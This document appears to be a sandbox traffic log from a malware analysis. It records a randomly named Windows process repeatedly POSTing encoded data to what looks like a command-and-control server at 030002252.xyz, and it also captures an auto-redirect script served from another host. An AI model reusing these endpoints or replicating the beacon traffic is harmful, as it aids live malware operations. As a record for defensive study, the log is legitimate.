Oct 11, 2024 10:05:00.935703039 CEST	1289	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 11 Oct 2024 08:05:00 GMT Content-Type: text/html; charset=utf-8 Content-Length: 2966 Connection: close Vary: Accept-Encoding ETag: "66cd104a-b96" Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;color: #5d5d5d;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial,"Noto Sans", sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol","Noto Color Emoji";text-shadow: 0px 1px 1px rgba(255, 255, 255, 0.75);text-align: center;}h1 {font-size: 2.45em;font-weight: 700;color: #5d5d5d;letter-spacing: -0.02em;margin-bottom: 30px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;}.info {color: #5594cf;fill: #5594cf;}.error [TRUNCATED]
Oct 11, 2024 10:05:00.935801983 CEST	1289	IN	Data Raw: 66 66 63 63 33 33 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 66 66 63 63 33 33 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 73 75 63 63 65 73 73 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 61 62 61 34 37 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 35 61 62 61 Data Ascii: ffcc33;fill: #ffcc33;}.success {color: #5aba47;fill: #5aba47;}.icon-large {height: 132px;width: 132px;}.description-text {color: #707070;letter-spacing: -0.01em;font-size: 1.25
Oct 11, 2024 10:05:00.935853004 CEST	592	IN	Data Raw: 37 20 30 2d 35 38 2e 30 30 32 2d 36 30 2e 31 36 35 2d 31 30 32 2d 31 31 36 2e 35 33 31 2d 31 30 32 7a 4d 32 35 36 20 33 33 38 63 2d 32 35 2e 33 36 35 20 30 2d 34 36 20 32 30 2e 36 33 35 2d 34 36 20 34 36 20 30 20 32 35 2e 33 36 34 20 32 30 2e 36 Data Ascii: 7 0-58.002-60.165-102-116.531-102zM256 338c-25.365 0-46 20.635-46 46 0 25.364 20.635 46 46 46s46-20.636 46-46c0-25.365-20.635-46-46-46z"></path></svg></div><h1 class="animate__animated animate__fadeIn">Page Not Found

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
70	192.168.11.20	49888	65.21.196.90	80	7868	C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 10:05:06.142280102 CEST	798	OUT	POST /2ncs/ HTTP/1.1 Host: www.030002252.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Origin: http://www.030002252.xyz Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 200 Referer: http://www.030002252.xyz/2ncs/ User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4 Data Raw: 41 54 6b 3d 50 2f 5a 59 6b 6a 4c 42 55 59 45 76 74 38 53 45 52 52 35 6f 65 32 71 34 74 45 4f 34 34 33 76 76 55 33 69 6c 67 39 50 63 55 42 75 30 2b 45 59 6c 62 75 68 76 36 72 6c 4e 6b 66 4d 49 76 4a 49 51 49 51 39 56 54 49 49 31 39 50 4a 6a 66 54 4b 4a 4c 61 59 2f 69 51 67 4f 45 6c 44 34 47 76 44 5a 4e 33 72 49 6c 6e 47 67 4e 73 37 39 57 7a 46 72 4c 33 70 48 73 35 47 50 57 2b 6c 63 68 37 35 79 69 55 30 48 64 50 41 34 4d 45 53 58 43 36 6a 69 43 71 42 39 30 30 59 6e 72 6c 6f 56 6e 78 50 65 50 46 75 71 72 32 4b 77 31 74 57 76 56 43 6b 72 4a 50 53 4d 49 2f 6f 45 34 72 71 52 52 63 4c 41 4e 77 3d 3d Data Ascii: ATk=P/ZYkjLBUYEvt8SERR5oe2q4tEO443vvU3ilg9PcUBu0+EYlbuhv6rlNkfMIvJIQIQ9VTII19PJjfTKJLaY/iQgOElD4GvDZN3rIlnGgNs79WzFrL3pHs5GPW+lch75yiU0HdPA4MESXC6jiCqB900YnrloVnxPePFuqr2Kw1tWvVCkrJPSMI/oE4rqRRcLANw==
Oct 11, 2024 10:05:06.333465099 CEST	1032	IN	HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 796 date: Fri, 11 Oct 2024 08:05:06 GMT vary: User-Agent Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
71	192.168.11.20	49889	65.21.196.90	80	7868	C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 10:05:08.876280069 CEST	818	OUT	POST /2ncs/ HTTP/1.1 Host: www.030002252.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Origin: http://www.030002252.xyz Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 220 Referer: http://www.030002252.xyz/2ncs/ User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4 Data Raw: 41 54 6b 3d 50 2f 5a 59 6b 6a 4c 42 55 59 45 76 2f 76 4b 45 63 51 35 6f 50 47 71 2f 30 30 4f 34 68 6e 75 6b 55 33 65 6c 67 34 75 42 55 31 43 30 39 67 63 6c 56 50 68 76 33 4c 6c 4e 72 2f 4d 4a 67 70 49 58 49 51 42 64 54 4b 63 31 39 50 4e 6a 66 57 75 4a 4c 4a 41 67 67 41 67 49 4d 46 44 36 62 2f 44 5a 4e 33 72 49 6c 6a 57 61 4e 73 54 39 58 43 31 72 4b 56 4e 47 6b 5a 47 49 52 2b 6c 63 6c 37 35 32 69 55 31 51 64 4f 63 53 4d 47 71 58 43 34 72 69 43 34 70 2b 2b 30 59 68 30 56 70 36 6a 51 71 77 45 6b 4c 63 75 32 36 52 36 2b 6e 53 55 55 31 78 55 39 6d 6f 4c 73 30 32 38 62 54 35 54 65 4b 62 51 37 4f 30 44 44 73 44 36 4a 61 6e 35 6e 70 70 6e 42 75 71 4e 62 49 3d Data Ascii: ATk=P/ZYkjLBUYEv/vKEcQ5oPGq/00O4hnukU3elg4uBU1C09gclVPhv3LlNr/MJgpIXIQBdTKc19PNjfWuJLJAggAgIMFD6b/DZN3rIljWaNsT9XC1rKVNGkZGIR+lcl752iU1QdOcSMGqXC4riC4p++0Yh0Vp6jQqwEkLcu26R6+nSUU1xU9moLs028bT5TeKbQ7O0DDsD6Jan5nppnBuqNbI=
Oct 11, 2024 10:05:09.083440065 CEST	1032	IN	HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 796 date: Fri, 11 Oct 2024 08:05:08 GMT vary: User-Agent Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
72	192.168.11.20	49890	65.21.196.90	80	7868	C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 10:05:11.594331026 CEST	2578	OUT	POST /2ncs/ HTTP/1.1 Host: www.030002252.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Origin: http://www.030002252.xyz Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 7368 Referer: http://www.030002252.xyz/2ncs/ User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4 Data Raw: 41 54 6b 3d 50 2f 5a 59 6b 6a 4c 42 55 59 45 76 2f 76 4b 45 63 51 35 6f 50 47 71 2f 30 30 4f 34 68 6e 75 6b 55 33 65 6c 67 34 75 42 55 31 4b 30 2b 54 45 6c 61 4d 4a 76 32 4c 6c 4e 31 76 4d 4d 67 70 4a 4c 49 51 5a 5a 54 4b 52 49 39 4d 35 6a 63 77 79 4a 63 73 73 67 71 41 67 49 4f 46 44 6e 47 76 44 49 4e 32 62 4d 6c 6e 4b 61 4e 73 54 39 58 41 74 72 44 6e 70 47 70 35 47 50 57 2b 6c 51 68 37 35 65 69 56 63 6c 64 4f 6f 6f 50 33 4b 58 43 59 37 69 41 4c 42 2b 6a 45 59 6a 33 56 70 69 6a 51 57 7a 45 6e 75 6a 75 32 4f 72 36 38 48 53 58 6c 77 78 54 4e 54 33 52 74 34 46 2b 72 4c 69 64 74 4b 65 56 35 4f 41 4c 41 77 57 35 38 6d 7a 78 47 35 35 79 42 37 73 53 37 31 4c 2f 48 45 63 32 62 77 4d 41 30 36 52 48 43 76 35 58 74 68 55 32 54 54 68 76 78 78 47 2b 49 32 52 7a 48 69 63 6a 30 71 72 32 63 31 76 6f 37 54 5a 46 78 64 6e 43 4a 53 30 49 74 77 4f 5a 31 65 4b 78 2b 4c 73 68 79 39 78 76 42 48 76 59 6d 2f 30 5a 47 65 41 68 71 63 53 6e 32 62 44 4f 6d 69 75 50 74 30 4e 39 55 78 46 58 6a 72 44 67 6f 6d 68 63 76 53 70 44 33 [TRUNCATED] Data Ascii: ATk=P/ZYkjLBUYEv/vKEcQ5oPGq/00O4hnukU3elg4uBU1K0+TElaMJv2LlN1vMMgpJLIQZZTKRI9M5jcwyJcssgqAgIOFDnGvDIN2bMlnKaNsT9XAtrDnpGp5GPW+lQh75eiVcldOooP3KXCY7iALB+jEYj3VpijQWzEnuju2Or68HSXlwxTNT3Rt4F+rLidtKeV5OALAwW58mzxG55yB7sS71L/HEc2bwMA06RHCv5XthU2TThvxxG+I2RzHicj0qr2c1vo7TZFxdnCJS0ItwOZ1eKx+Lshy9xvBHvYm/0ZGeAhqcSn2bDOmiuPt0N9UxFXjrDgomhcvSpD300Hf5ln6jVR8+WVIbsaMX5aHR0oum2SnOcq/LPjH89ymkulVMS9aMMRf7oVASkh051zfy8crwZtOruQ8ynJZbxHkBdaQxnZ7lgrQBBktzl2y7KrJtX+P/9mw/g71uGsnimkl2ppE0EVvIEPugex1A2nWzF/5VZjbVRU/ebPECJSiPx/Cq6KXfBQi1lXSqkXoNNqfaIs44qqDLwFleHWHAfSI6yWkB3MPNIVVouH3uweD3iXd0lepUXfzUYaPAYkGDqb19R3JCtwwyWu0l4p9lXkzmLLWahO1868OYhSgKQV3DSbYm8DYO8vNTp6tZkaAqYfJL8mSdzTffFMdOkmyFohAgc6VZwGkRqxe8dOBFOR6iJJFVW1G2KxLFzwLggoyvTztPQmH02Ov5SSSam6buW5NvV9mBrwvWFAC/yzk81xE/ByrMa5Bkez6kN8ZEKrpQgU3lypIVIktzVkCOQJq0htIe4Rv5igpjbdA+LZt/JErOq+xKA5QnszA9ZSQcOhRTo8nSMWdxyu95OTsr5IZ5Pwrek8FoXF9FwzmjHSPaC+RIgEZETdzMkGlukM/S8EqKWcDHiO/CUOn6saMCRIh7q9joOWdAnsbVaErA4hf4blmtGk6JEO1t4sjOuckCftVyZt490ZoRGm2Un5udSvIZjiWGr7DIHTQ8i [TRUNCATED]
Oct 11, 2024 10:05:11.594353914 CEST	2578	OUT	Data Raw: 31 58 5a 41 53 79 6b 64 6a 54 59 62 54 44 30 38 35 50 64 41 32 32 35 52 64 6f 50 79 33 79 71 4b 38 75 74 78 75 53 38 4a 48 67 4e 33 50 4b 66 2b 69 35 44 68 5a 6f 30 37 75 43 45 59 68 53 43 6a 74 61 51 68 4d 38 70 50 6f 31 4f 51 4d 65 6a 64 79 69 Data Ascii: 1XZASykdjTYbTD085PdA225RdoPy3yqK8utxuS8JHgN3PKf+i5DhZo07uCEYhSCjtaQhM8pPo1OQMejdyiQrW6Pgn53yFwkXvsp6hUjj596tg08cIhNhGEoLbLuHwXbgPOjxzA/BoMfI91yB8Uh+vTs5yO8b0DiBKMXpkwYU1PhOOLDf0v1AY0TGVcwkXHRZnCOyVNJf0R5KSrcCTffzGnh4djb0dsGOT6yeIMtdpZgtbmNl0Me
Oct 11, 2024 10:05:11.594428062 CEST	2811	OUT	Data Raw: 6b 6d 6c 30 49 62 56 50 39 35 2b 56 62 39 46 62 67 5a 45 79 2f 72 63 54 6a 68 56 77 2b 30 6b 65 62 75 41 2f 70 65 5a 42 4a 32 72 73 61 55 69 70 2f 4d 2f 52 47 4f 62 53 37 43 6f 75 75 57 6c 4d 66 65 32 59 77 6b 75 69 47 76 4c 67 4a 69 79 69 76 5a Data Ascii: kml0IbVP95+Vb9FbgZEy/rcTjhVw+0kebuA/peZBJ2rsaUip/M/RGObS7CouuWlMfe2YwkuiGvLgJiyivZWv/u571pm/bMd7R5FuZ9NLrnBxEtZzQFwGhrLZ6dCe2ZEwkJNghyl0+PUQmIUqWyffVSD9AOoftSNMlEVGkshFIE9okR+1DsUtHMntLzNvtmsbpVS/kD1ieSDC0ly8knsysNzrG0jNfB663Vzw6+V6q6xe9AYcy/K
Oct 11, 2024 10:05:11.785655022 CEST	1032	IN	HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 796 date: Fri, 11 Oct 2024 08:05:11 GMT vary: User-Agent Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
73	192.168.11.20	49891	65.21.196.90	80	7868	C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 10:05:14.328387022 CEST	541	OUT	GET /2ncs/?ATk=C9x4nV75ALRtqPK+aBsvNSORqAmxpUqabxnIo4b2Z27N+E0QPuJF7pc8iv4PlagxECtfepEWwKhTDmrEQ68cgQIoGVeGGvf3Nn6d9y2yCfOYMDMeHUtLkc0=&VDohI=5PBL_pQpTf5haV HTTP/1.1 Host: www.030002252.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
Oct 11, 2024 10:05:14.537560940 CEST	1032	IN	HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 796 date: Fri, 11 Oct 2024 08:05:14 GMT vary: User-Agent Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
74	192.168.11.20	49892	172.247.44.157	80	7868	C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 10:05:19.725208044 CEST	6	OUT	Data Raw: 50 Data Ascii: P
Oct 11, 2024 10:05:19.881961107 CEST	557	IN	HTTP/1.0 200 OK Connection: close Cache-Control: max-age=259200 Content-Type: text/html;charset=utf-8 Content-Length: 428 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 22 20 69 64 3d 22 68 61 6f 31 32 33 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 73 74 72 55 3d 22 68 74 74 70 73 3a 2f 2f 68 74 74 70 2e 67 6e 33 30 31 2e 63 6f 6d 3a 31 32 33 34 35 2f 3f 75 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2b 22 26 70 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e 61 6d 65 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 3b 68 61 6f 31 32 33 2e 68 72 65 66 3d 73 74 72 55 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 68 61 6f 31 32 33 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 20 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 [TRUNCATED] Data Ascii: <html><head></head><body><a href="" id="hao123"></a><script type="text/javascript">var strU="https://http.gn301.com:12345/?u="+window.location+"&p="+window.location.pathname+window.location.search;hao123.href=strU;if(document.all){document.getElementById("hao123").click();}else {var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("hao123").dispatchEvent(e);}</script></body></html>
Oct 11, 2024 10:05:19.888569117 CEST	6	OUT	Data Raw: 4f Data Ascii: O

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
75	192.168.11.20	49893	172.247.44.157	80	7868	C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 10:05:22.436248064 CEST	6	OUT	Data Raw: 50 Data Ascii: P
